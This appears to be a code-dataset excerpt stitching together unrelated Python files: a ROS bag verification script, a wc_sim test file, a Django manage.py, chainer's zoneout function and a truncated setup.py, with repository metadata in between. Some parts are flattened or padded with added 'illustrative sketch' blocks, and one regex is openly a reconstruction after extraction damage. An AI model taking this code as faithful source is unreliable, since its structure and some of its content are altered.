ret_val = and_beyond_handler(current_key, key)
# Handle /special topic
elif bag_message.topic == '/special':
ret_val = special_handler(current_key, key)
elif is_valid(bag_message):
ret_val = current_key.seq - key.seq
return ret_val
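# Illustrative sketch (not part of the original script): the sequence-number
# arithmetic compare_keys falls through to for an ordinary header-stamped
# topic. The key values below are made up for the example.
def _example_key_diff():
    prev = MessageKey(seq=10, secs=5, nsecs=0)
    curr = MessageKey(seq=11, secs=5, nsecs=100)
    # A diff of exactly 1 means "the next message from the same publisher";
    # larger positive gaps suggest missing data or a different publisher.
    return curr.seq - prev.seq  # == 1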
## Handle the verification of any special case topics that require
# different key verification logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify_special(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic == '/special':
key = topic_connection.get_key(current_key.child_frame_id)
if key is not None:
            if not special_handler(current_key, key):
print('Topic {} may not line up.'.format(bag_message.topic))
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
key)
logger.debug('verify_special topic_connection: %s, current_key: %s',
topic_connection, current_key)
topic_connection.set_key(current_key.child_frame_id, current_key)
## Handle the verification of all topics not requiring special case logic
# @param bag_message The message from the bag
# @param topic_connection The TopicConnection object containing topic keys
# and number of connections
# @param current_key The key of the current message to compare
def verify(bag_message, topic_connection, current_key):
logger = get_logger()
if bag_message.topic in SPECIAL_TOPICS:
verify_special(bag_message, topic_connection, current_key)
return
if len(topic_connection.keys) == 0:
topic_connection.add_key(current_key)
return
lowest_diff = None
index = -1
for i, key in enumerate(topic_connection.keys):
diff = compare_keys(bag_message, current_key, key)
if diff is not None:
if lowest_diff is None or diff < lowest_diff:
lowest_diff = diff
index = i
if lowest_diff is None:
logger.debug('lowest_diff is None.\n' \
'current_key: %s;\n' \
'topic_connection: %s',
current_key,
topic_connection)
return
if lowest_diff == 1:
topic_connection.set_key(index, current_key)
logger.debug('lowest_diff == 1.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= 0 and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff <= 0 and len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff > FLAGS.tolerance and len(topic_connection.keys) < \
topic_connection.connections:
topic_connection.add_key(current_key)
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
logger.debug('lowest_diff > FLAGS.tolerance and ' \
'len(topic_connection.keys) < ' \
'topic_connection.connections.\ncurrent_key: %s\nkey: %s',
current_key,
topic_connection)
elif lowest_diff <= FLAGS.tolerance:
logger.debug('lowest_diff: %s index: %s topic: %s',
lowest_diff, index, bag_message.topic)
print('Topic {} does not line up by {} messages'.format(
bag_message.topic, lowest_diff))
CURRENT_REPORT.add_bad_topic(bag_message.topic, lowest_diff)
logger.debug('current_key: %s\n' \
'key: %s',
current_key,
topic_connection.get_key(index))
topic_connection.set_key(index, current_key)
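# Illustrative sketch (not part of the original script): how the branches of
# verify() above classify a sequence gap. The tolerance default of 10 mirrors
# the --tolerance flag.
def _example_classify_gap(diff, tolerance=10):
    if diff == 1:
        return 'in order'        # the key simply advances
    if diff <= 0 or diff > tolerance:
        return 'new publisher'   # tracked as an extra key while room remains
    return 'missing data'        # reported as "does not line up"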
## Verify the contents of a single file
# @param file The path to the file to verify
# @param topic_connections All topic connections
def verify_file(file, topic_connections):
with rosbag.Bag(file, 'r') as bag:
bag_info = bag.get_type_and_topic_info()
topic_connections[file] = set(bag_info.topics.keys())
for topic, value in bag_info.topics.items():
if topic in ILLEGAL_TOPICS:
continue
topic_connection = topic_connections.get(topic)
if topic_connection:
topic_connection.connections = value.connections
else:
if topic in SPECIAL_TOPICS:
topic_connections[topic] = TopicConnection(
topic, value.connections, special_topic=True)
else:
topic_connections[topic] = TopicConnection(
topic, value.connections)
messages = bag.read_messages()
for bag_message in messages:
if bag_message.topic in ILLEGAL_TOPICS:
continue
current_key = get_message_key(bag_message)
verify(
bag_message,
topic_connections[bag_message.topic],
current_key
)
## Reset the keys for specific topics
# @param topic_connections All topic connections
# @param topics_to_clear The list of topics to clear the keys of
def reset_topics(topic_connections, topics_to_clear):
for topic in topics_to_clear:
topic_connection = topic_connections.get(topic)
if topic_connection is not None:
topic_connection.reset()
## Verify all the files in a directory
# @param files_list The list of file paths to verify
# @param tbc The TopicBagChecker to use for verification of bags
# and clearing of keys
def verify_files_in_directory(files_list, tbc):
logger = get_logger()
mode_pattern = r'^[a-zA-Z0-9_ -/()]*\d+_(?P<mode>.*)_\d+\.bag$'
topic_connections = {}
previous_mode = None
for file in files_list:
logger.info('Processing file %s', file)
if previous_mode is not None:
match = re.match(mode_pattern, file)
if match is not None:
current_mode = match.group('mode')
if current_mode != previous_mode:
topics_to_clear = tbc.process_bag(previous_mode,
current_mode)
reset_topics(topic_connections, topics_to_clear)
previous_mode = current_mode
else:
match = re.match(mode_pattern, file)
if match:
previous_mode = match.group('mode')
logger.debug('previous_mode: %s', previous_mode)
verify_file(file, topic_connections)
## Gets the paths to the kml files
# Gets the paths to the kml files using the --kml-path command line argument
# first. If no command line parameter is given or it is invalid, it looks for
# kml files in the directory that is currently being processed. If there is
# still no kml file found, the final place checked is the ddr_data_recorder
# package.
# @param directory The current directory being verified
# @returns list The paths to the kml files found, or an empty list
def get_kml_paths(directory):
logger = get_logger()
kml_glob_pattern = '{}/*.xml'
# Check if the user specified a kml file
if FLAGS.kml_path:
if not FLAGS.kml_path.endswith('/'):
kml_path = os.path.expanduser(FLAGS.kml_path)
if os.path.isfile(kml_path):
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.chosen_kml_name = os.path.basename(kml_path)
CURRENT_REPORT.kml_reason = \
'User specified a KML file for verification'
return [kml_path]
logger.info(
'"%s" is not a valid kml path. Attempting to find a kml in "%s"',
kml_path,
directory
)
# User did not specify a kml, attempt to find one in the current directory
kml_paths = glob.glob(kml_glob_pattern.format(directory))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was found in capture folder'
return kml_paths
# No kml in current directory, attempt to find one
# in the ddr_data_recorder ros package
ddr_dir = os.path.join(
SCRIPTS_PATH,
'dynamic_recording'
)
logger.info(
'No kml file in "%s". Attempting to find a kml in "%s"',
directory,
ddr_dir
)
kml_paths = glob.glob(kml_glob_pattern.format(ddr_dir))
if kml_paths:
CURRENT_REPORT.kml_exists = True
CURRENT_REPORT.kml_reason = 'KML file was not found in capture ' \
'folder, but was found in the installation directory'
return kml_paths
logger.info('No kml files found.')
return []
## Gets the paths to the markdown files
# Gets the paths to the markdown files in the current directory, in the
# arbitrary order glob returns them.
# @param directory The current directory being verified
# @returns list The paths to the markdown files, or an empty list
def get_markdown_paths(directory):
markdown_paths = glob.glob(os.path.join(directory, '*.md'))
    # Always return a list; verify_kml_hash iterates over the result.
    if markdown_paths:
        return markdown_paths
logger = get_logger()
logger.info('No markdown files found in "%s"', directory)
return []
## Gets the kml hash from the markdown file
# Looks through the markdown file and finds the line that contains the hash of
# the kml file used when it was created
# @param markdown_path The path to the markdown file to get the hash from
# @returns String The hash of the kml from the markdown
def get_markdown_hash(markdown_path):
logger = get_logger()
try:
with open(markdown_path, 'rb', 0) as _file, \
mmap.mmap(_file.fileno(), 0, access=mmap.ACCESS_READ) \
as markdown_file:
            search_result = re.search(
                # The original pattern was garbled in extraction; this is a
                # plausible reconstruction. Any bytes regex with a named
                # 'hash' group matching the hex digest works here.
                br'(?P<hash>[0-9a-f]{32,64})',
                markdown_file
            )
if search_result:
markdown_hash = search_result.group('hash').decode('utf-8')
if CURRENT_REPORT is not None:
CURRENT_REPORT.markdown_hash_exists = True
CURRENT_REPORT.markdown_hash = markdown_hash
logger.info('Hash for kml found in "%s"', markdown_path)
return markdown_hash
except ValueError:
pass
logger.info('No hash for kml found in "%s"', markdown_path)
return ''
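# Illustrative sketch (not part of the original script): the named-group
# extraction the mmap search above performs. The pattern and input here are
# made up; the real pattern only needs a bytes regex with a 'hash' group.
_example_match = re.search(br'hash: (?P<hash>[0-9a-f]+)', b'kml hash: deadbeef')
# _example_match.group('hash').decode('utf-8') == 'deadbeef'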
## Verifies that the hash of a kml file matches the hash from a markdown file
# @param kml_paths The paths to the kml files to verify
# @param markdown_paths The paths to the markdown files to check for a hash
# @returns (Bool, String) Whether a hash matched, and the chosen kml path
def verify_kml_hash(kml_paths, markdown_paths):
logger = get_logger()
for markdown_path in markdown_paths:
markdown_kml_hash = get_markdown_hash(markdown_path)
if markdown_kml_hash:
logger.debug('markdown_kml_hash = %s', markdown_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_markdown_name = \
os.path.basename(markdown_path)
break
for kml_path in kml_paths:
current_kml_hash = util.generate_hash(kml_path) # pylint: disable=no-member
if not markdown_kml_hash:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return False, kml_path
if current_kml_hash == markdown_kml_hash:
logger.debug('kml_hash = %s', current_kml_hash)
if CURRENT_REPORT is not None:
CURRENT_REPORT.chosen_kml_name = util.get_path_with_parents( # pylint: disable=no-member
kml_path, 1)
CURRENT_REPORT.chosen_kml_hash = current_kml_hash
return True, kml_path
return False, ''
def write_report():
if CURRENT_REPORT is not None:
with CURRENT_REPORT:
CURRENT_REPORT.write_header()
CURRENT_REPORT.write_settings(**vars(FLAGS))
CURRENT_REPORT.write_kml_section()
CURRENT_REPORT.write_files_verified()
CURRENT_REPORT.write_unverified_topics(ILLEGAL_TOPICS)
CURRENT_REPORT.write_bad_topics()
def main():
global CURRENT_REPORT # pylint: disable=global-statement
argv = [sys.argv[0]] + parse_args(sys.argv[1:])
logger = get_logger()
logger.debug('FLAGS=%s', FLAGS)
logger.debug('argv=%s', argv)
logger.info('Unable to verify the following topics:\n%s', pprint.pformat(
ILLEGAL_TOPICS))
logger.info('Topics requiring special handling:\n%s', pprint.pformat(
SPECIAL_TOPICS))
directories = map(os.path.expanduser, FLAGS.directories)
for directory in directories:
if os.path.isdir(directory):
logger.info('Processing directory "%s"', directory)
CURRENT_REPORT = VerificationReport(directory)
kml_paths = get_kml_paths(directory)
if not kml_paths:
print('Unable to verify "{}". No kml found.'.format(directory))
if CURRENT_REPORT is not None:
CURRENT_REPORT.kml_exists = False
write_report()
continue
markdown_paths = get_markdown_paths(directory)
if not markdown_paths:
print('Unable to verify "{}". No markdown ' \
'to compare kml hash against.'.format(directory))
else:
hash_verified, kml_path = verify_kml_hash(
kml_paths, markdown_paths)
if CURRENT_REPORT is not None:
CURRENT_REPORT.matching_hashes = hash_verified
if not hash_verified:
print('Unable to verify {}. KML and markdown ' \
'hashes do not match.'.format(directory))
tbc = TopicBagChecker(kml_path)
files_list = util.get_sorted_files_list(directory) # pylint: disable=no-member
if CURRENT_REPORT is not None:
CURRENT_REPORT.files_list = files_list
verify_files_in_directory(files_list, tbc)
else:
logger.info('"%s" is not a directory.', directory)
write_report()
if __name__ == '__main__':
main()
| true
| true
|
f707b9a52128990810436baec085b0207d9a58e1
| 8,369
|
py
|
Python
|
tests/testing/test_utils.py
|
KarrLab/wc_sim
|
5b0ee03c3d19193fa67a3797d4258b753e6bc576
|
[
"MIT"
] | 8
|
2018-03-27T21:35:25.000Z
|
2022-01-18T08:32:20.000Z
|
tests/testing/test_utils.py
|
KarrLab/wc_sim
|
5b0ee03c3d19193fa67a3797d4258b753e6bc576
|
[
"MIT"
] | 114
|
2018-02-27T14:14:39.000Z
|
2020-12-30T15:06:51.000Z
|
tests/testing/test_utils.py
|
KarrLab/wc_sim
|
5b0ee03c3d19193fa67a3797d4258b753e6bc576
|
[
"MIT"
] | 2
|
2019-04-05T16:17:28.000Z
|
2020-05-17T12:55:20.000Z
|
""" Test utilities for testing
:Author: Arthur Goldberg <Arthur.Goldberg@mssm.edu>
:Date: 2019-10-31
:Copyright: 2019, Karr Lab
:License: MIT
"""
from scipy.constants import Avogadro
import os
import shutil
import tempfile
import unittest
from de_sim.simulation_config import SimulationConfig
from wc_sim.multialgorithm_simulation import MultialgorithmSimulation
from wc_sim.sim_config import WCSimulationConfig
from wc_sim.simulation import Simulation
from wc_sim.testing.make_models import MakeModel
from wc_sim.testing.utils import (check_simul_results, plot_expected_vs_simulated, get_expected_dependencies,
create_run_directory)
class TestTestingUtils(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
self.results_dir = tempfile.mkdtemp(dir=self.tmp_dir)
self.args = dict(results_dir=tempfile.mkdtemp(dir=self.tmp_dir),
checkpoint_period=1)
de_simulation_config = SimulationConfig(max_time=10, output_dir=tempfile.mkdtemp(dir=self.tmp_dir))
self.wc_sim_config = WCSimulationConfig(de_simulation_config, checkpoint_period=1)
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_check_simul_results(self):
init_volume = 1E-16
init_density = 1000
molecular_weight = 100.
default_species_copy_number = 10_000
init_accounted_mass = molecular_weight * default_species_copy_number / Avogadro
init_accounted_density = init_accounted_mass / init_volume
        expected_initial_values_compt_1 = dict(
            init_volume=init_volume,
            init_accounted_mass=init_accounted_mass,
            init_mass=init_volume * init_density,
            init_density=init_density,
            init_accounted_density=init_accounted_density,
            accounted_fraction=init_accounted_density / init_density
        )
expected_initial_values = {'compt_1': expected_initial_values_compt_1}
model = MakeModel.make_test_model('1 species, 1 reaction',
init_vols=[expected_initial_values_compt_1['init_volume']],
init_vol_stds=[0],
density=init_density,
molecular_weight=molecular_weight,
default_species_copy_number=default_species_copy_number,
default_species_std=0,
submodel_framework='WC:deterministic_simulation_algorithm')
multialgorithm_simulation = MultialgorithmSimulation(model, self.wc_sim_config)
_, dynamic_model = multialgorithm_simulation.build_simulation()
check_simul_results(self, dynamic_model, None, expected_initial_values=expected_initial_values)
# test dynamics
simulation = Simulation(model)
results_dir = simulation.run(max_time=2, **self.args).results_dir
nan = float('NaN')
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]},
rel_tol=1E-5)
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 9.999e-14, 9.998e-14]}})
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[nan, nan, nan]}})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}},
rel_tol=0)
plots_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'results'))
os.makedirs(plots_dir, exist_ok=True)
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]},
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]},
expected_property_trajectories=\
{'compt_1':
{'mass':[nan, nan, nan]}})
def test_expected_dependencies(self):
eds = get_expected_dependencies()
self.assertEqual(eds['DynamicStopCondition']['reaction_9'], {'stop_condition_7'})
self.assertEqual(eds['DynamicStopCondition']['reaction_10'], set())
def test_create_run_directory(self):
def run_dir_test(self, run_dir):
self.assertTrue(os.path.isdir(run_dir))
os.rmdir(run_dir)
# rm the date dir if it's empty
try:
date_dir = os.path.abspath(os.path.join(run_dir, ".."))
os.rmdir(date_dir)
except OSError:
pass
run_dir_test(self, create_run_directory())
run_dir_test(self, create_run_directory(base_dir='/tmp/runs', in_repo=False))
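# Illustrative sketch (not part of the original tests): the unit bookkeeping
# behind init_accounted_mass above, with the same made-up constants
# (molecular weight 100 g/mol, copy number 10_000).
_example_accounted_mass = 100. * 10_000 / Avogadro  # grams, roughly 1.66e-18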
| 52.30625
| 109
| 0.556936
|
from scipy.constants import Avogadro
import os
import shutil
import tempfile
import unittest
from de_sim.simulation_config import SimulationConfig
from wc_sim.multialgorithm_simulation import MultialgorithmSimulation
from wc_sim.sim_config import WCSimulationConfig
from wc_sim.simulation import Simulation
from wc_sim.testing.make_models import MakeModel
from wc_sim.testing.utils import (check_simul_results, plot_expected_vs_simulated, get_expected_dependencies,
create_run_directory)
class TestTestingUtils(unittest.TestCase):
def setUp(self):
self.tmp_dir = tempfile.mkdtemp()
self.results_dir = tempfile.mkdtemp(dir=self.tmp_dir)
self.args = dict(results_dir=tempfile.mkdtemp(dir=self.tmp_dir),
checkpoint_period=1)
de_simulation_config = SimulationConfig(max_time=10, output_dir=tempfile.mkdtemp(dir=self.tmp_dir))
self.wc_sim_config = WCSimulationConfig(de_simulation_config, checkpoint_period=1)
def tearDown(self):
shutil.rmtree(self.tmp_dir)
def test_check_simul_results(self):
init_volume = 1E-16
init_density = 1000
molecular_weight = 100.
default_species_copy_number = 10_000
init_accounted_mass = molecular_weight * default_species_copy_number / Avogadro
init_accounted_density = init_accounted_mass / init_volume
        expected_initial_values_compt_1 = dict(
            init_volume=init_volume,
            init_accounted_mass=init_accounted_mass,
            init_mass=init_volume * init_density,
            init_density=init_density,
            init_accounted_density=init_accounted_density,
            accounted_fraction=init_accounted_density / init_density
        )
expected_initial_values = {'compt_1': expected_initial_values_compt_1}
model = MakeModel.make_test_model('1 species, 1 reaction',
init_vols=[expected_initial_values_compt_1['init_volume']],
init_vol_stds=[0],
density=init_density,
molecular_weight=molecular_weight,
default_species_copy_number=default_species_copy_number,
default_species_std=0,
submodel_framework='WC:deterministic_simulation_algorithm')
multialgorithm_simulation = MultialgorithmSimulation(model, self.wc_sim_config)
_, dynamic_model = multialgorithm_simulation.build_simulation()
check_simul_results(self, dynamic_model, None, expected_initial_values=expected_initial_values)
simulation = Simulation(model)
results_dir = simulation.run(max_time=2, **self.args).results_dir
nan = float('NaN')
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000.]})
check_simul_results(self, dynamic_model, results_dir,
expected_initial_values=expected_initial_values,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 9999., 9998.]},
rel_tol=1E-5)
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 9.999e-14, 9.998e-14]}})
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[nan, nan, nan]}})
with self.assertRaises(AssertionError):
check_simul_results(self, dynamic_model, results_dir,
expected_property_trajectories={'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}},
rel_tol=0)
plots_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'tests', 'results'))
os.makedirs(plots_dir, exist_ok=True)
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]},
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_property_trajectories=\
{'compt_1':
{'mass':[1.000e-13, 1.000e-13, 9.999e-14]}})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[10000., 10000., 9998.]})
plot_expected_vs_simulated(dynamic_model,
'ordinary_differential_equations',
results_dir,
trajectory_times=[0, 1, 2],
plots_dir=plots_dir,
expected_species_trajectories=\
{'spec_type_0[compt_1]':[nan, nan, nan]},
expected_property_trajectories=\
{'compt_1':
{'mass':[nan, nan, nan]}})
def test_expected_dependencies(self):
eds = get_expected_dependencies()
self.assertEqual(eds['DynamicStopCondition']['reaction_9'], {'stop_condition_7'})
self.assertEqual(eds['DynamicStopCondition']['reaction_10'], set())
def test_create_run_directory(self):
def run_dir_test(self, run_dir):
self.assertTrue(os.path.isdir(run_dir))
os.rmdir(run_dir)
try:
date_dir = os.path.abspath(os.path.join(run_dir, ".."))
os.rmdir(date_dir)
except OSError:
pass
run_dir_test(self, create_run_directory())
run_dir_test(self, create_run_directory(base_dir='/tmp/runs', in_repo=False))
| true
| true
|
f707b9b5d7a17b991547f656a386101cbfa92cf6
| 630
|
py
|
Python
|
manage.py
|
rudmanmrrod/watchin-sge
|
4fd6d115844776a4763266bd7f0da02eb104f2b4
|
[
"MIT"
] | null | null | null |
manage.py
|
rudmanmrrod/watchin-sge
|
4fd6d115844776a4763266bd7f0da02eb104f2b4
|
[
"MIT"
] | 15
|
2019-06-28T13:29:00.000Z
|
2022-02-10T13:04:27.000Z
|
manage.py
|
rudmanmrrod/watchin-crm
|
4fd6d115844776a4763266bd7f0da02eb104f2b4
|
[
"MIT"
] | 1
|
2019-06-23T22:08:40.000Z
|
2019-06-23T22:08:40.000Z
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'WatchInSGE.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.636364
| 74
| 0.684127
|
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'WatchInSGE.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| true
| true
|
f707ba5f9a433519d7a5c0fa0beed5db34669b0c
| 2,333
|
py
|
Python
|
chainer/functions/noise/zoneout.py
|
Evanc123/chainer
|
929af7189b1271683200aa9b0ba6da2dd3dee110
|
[
"MIT"
] | null | null | null |
chainer/functions/noise/zoneout.py
|
Evanc123/chainer
|
929af7189b1271683200aa9b0ba6da2dd3dee110
|
[
"MIT"
] | null | null | null |
chainer/functions/noise/zoneout.py
|
Evanc123/chainer
|
929af7189b1271683200aa9b0ba6da2dd3dee110
|
[
"MIT"
] | null | null | null |
import numpy
from chainer.backends import cuda
from chainer import configuration
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
class Zoneout(function_node.FunctionNode):
"""Zoneout regularization."""
def __init__(self, zoneout_ratio):
self.zoneout_ratio = zoneout_ratio
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
def forward(self, inputs):
self.retain_inputs(())
h, x = inputs
xp = cuda.get_array_module(*x)
if xp is numpy:
flag_x = xp.random.rand(*x.shape) >= self.zoneout_ratio
else:
flag_x = (xp.random.rand(*x.shape) >=
self.zoneout_ratio)
self.flag_h = xp.ones_like(flag_x) ^ flag_x
self.flag_x = flag_x
return h * self.flag_h + x * self.flag_x,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
ret = []
if 0 in indexes:
ret.append(gy * self.flag_h)
if 1 in indexes:
ret.append(gy * self.flag_x)
return ret
def zoneout(h, x, ratio=.5, **kwargs):
"""zoneout(h, x, ratio=.5)
    Randomly drops elements of the input variable and replaces them with the
    corresponding elements of the previous variable.
    This function drops input elements randomly with probability ``ratio`` and
    instead keeps the corresponding elements of the previous variable. In
    testing mode, it does nothing and just returns ``x``.
.. warning::
``train`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('train', train)``.
See :func:`chainer.using_config`.
Args:
h (~chainer.Variable): Previous variable.
x (~chainer.Variable): Input variable.
ratio (float): Zoneout ratio.
Returns:
~chainer.Variable: Output variable.
See the paper: `Zoneout: Regularizing RNNs by Randomly Preserving Hidden \
Activations <https://arxiv.org/abs/1606.01305>`_.
"""
if kwargs:
argument.check_unexpected_kwargs(
kwargs, train='train argument is not supported anymore. '
'Use chainer.using_config')
argument.assert_kwargs_empty(kwargs)
if configuration.config.train:
return Zoneout(ratio).apply((h, x))[0]
return x
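# Illustrative sketch (not part of the chainer source): the elementwise rule
# the training branch above computes, written with plain numpy. The shape,
# seed and ratio are made up for the example.
_rng = numpy.random.RandomState(0)
_h_prev = numpy.zeros(5)                      # previous hidden state
_x_new = numpy.ones(5)                        # candidate new state
_keep_x = _rng.rand(5) >= .5                  # True where the new value survives
_out = numpy.where(_keep_x, _x_new, _h_prev)  # dropped elements revert to _h_prev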
| 29.1625
| 79
| 0.638663
|
import numpy
from chainer.backends import cuda
from chainer import configuration
from chainer import function_node
from chainer.utils import argument
from chainer.utils import type_check
class Zoneout(function_node.FunctionNode):
def __init__(self, zoneout_ratio):
self.zoneout_ratio = zoneout_ratio
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
def forward(self, inputs):
self.retain_inputs(())
h, x = inputs
xp = cuda.get_array_module(*x)
if xp is numpy:
flag_x = xp.random.rand(*x.shape) >= self.zoneout_ratio
else:
flag_x = (xp.random.rand(*x.shape) >=
self.zoneout_ratio)
self.flag_h = xp.ones_like(flag_x) ^ flag_x
self.flag_x = flag_x
return h * self.flag_h + x * self.flag_x,
def backward(self, indexes, grad_outputs):
gy, = grad_outputs
ret = []
if 0 in indexes:
ret.append(gy * self.flag_h)
if 1 in indexes:
ret.append(gy * self.flag_x)
return ret
def zoneout(h, x, ratio=.5, **kwargs):
if kwargs:
argument.check_unexpected_kwargs(
kwargs, train='train argument is not supported anymore. '
'Use chainer.using_config')
argument.assert_kwargs_empty(kwargs)
if configuration.config.train:
return Zoneout(ratio).apply((h, x))[0]
return x
| true
| true
|
f707baca67d5ac400a8642a3a09ab91d38f7b40d
| 1,841
|
py
|
Python
|
setup.py
|
Sage-Bionetworks/tool-registry-client
|
88abc84a51e3843bff73b4f958571646d4ccc3cd
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
Sage-Bionetworks/tool-registry-client
|
88abc84a51e3843bff73b4f958571646d4ccc3cd
|
[
"Apache-2.0"
] | 1
|
2020-12-09T17:55:11.000Z
|
2021-12-21T18:40:13.000Z
|
setup.py
|
Sage-Bionetworks/tool-registry-client
|
88abc84a51e3843bff73b4f958571646d4ccc3cd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
# basic
name='tool-registry-client',
version='0.1.0',
# packages=setuptools.find_packages(exclude=["tests", "tests.*"]),
# py_modules=['hello'],
# scripts=['bin/nlp-evaluate'],
packages=setuptools.find_packages(),
entry_points={
# 'console_scripts': ['rocc-cli=roccclient.cli.__main__:main']
},
# requirements
python_requires='>=3.6.*',
install_requires=[
'click>=7.1.2',
'jsonschema>=3.2.0',
'synapseclient>=2.2.0'
],
# metadata to display on PyPI
description='Tool Registry Library for Python',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Sage-Bionetworks/tool-registry-client',
author='The Tool Registry Team',
author_email='thomas.schaffter@sagebionetworks.org',
license='Apache',
project_urls={
"Source Code": "https://github.com/Sage-Bionetworks/tool-registry-client", # noqa: E501
"Bug Tracker": "https://github.com/Sage-Bionetworks/tool-registry-client/issues", # noqa: E501
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
